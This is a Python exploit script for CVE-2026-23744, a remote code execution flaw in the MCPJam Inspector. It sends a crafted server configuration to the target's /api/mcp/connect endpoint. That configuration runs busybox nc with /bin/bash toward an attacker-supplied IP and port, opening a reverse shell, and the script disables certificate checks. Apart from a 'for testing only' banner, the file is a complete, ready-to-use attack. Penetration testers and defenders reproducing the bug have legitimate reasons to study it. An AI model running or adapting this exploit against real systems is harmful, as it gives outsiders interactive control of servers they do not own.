#!/usr/bin/env python3

#################################
#                               #
#       CVE-2026-23744.py       #
#       for testing only        #
#                               #
#################################

import requests
import argparse
import json
import sys
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def main():
    parser = argparse.ArgumentParser(description='MCPJam Inspector RCE (GHSA-232v-j27c-5pp6) - CVE-2026-23744')
    parser.add_argument('--target', '-t', required=True, help='Target URL e.g. https://mcp.domain.com')
    parser.add_argument('--att-ip', '-i', required=True, help='Attacker IP for revshell listener')
    parser.add_argument('--att-port', '-p', required=True, help='Attacker port for revshell listener')

    args = parser.parse_args()

    url = f'{args.target}/api/mcp/connect'

    data = {"serverConfig": {"command": "busybox", "args": ["nc", args.att_ip, args.att_port, "-e", "/bin/bash"], "env": {}}, "serverId": "mcp_test_server"}

    print(f"\n{parser.description}\n")

    print(f"[+] Sending revshell to {args.att_ip}:{args.att_port} via {url}")
    print(f"[+] Payload: {json.dumps(data)}")

    try:
        response = requests.post(url, json=data, verify=False, timeout=10)
        print(f"[+] Status: {response.status_code}")
        print(f"[+] Response: {response.text}")

        if response.status_code == 200:
            print("[+] Check your listener!")
        else:
            print("[-] Exploit failed - check target/path")

    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        print("[+] Check your listener, script did not detect response.")
        sys.exit(1)

if __name__ == "__main__":
    main()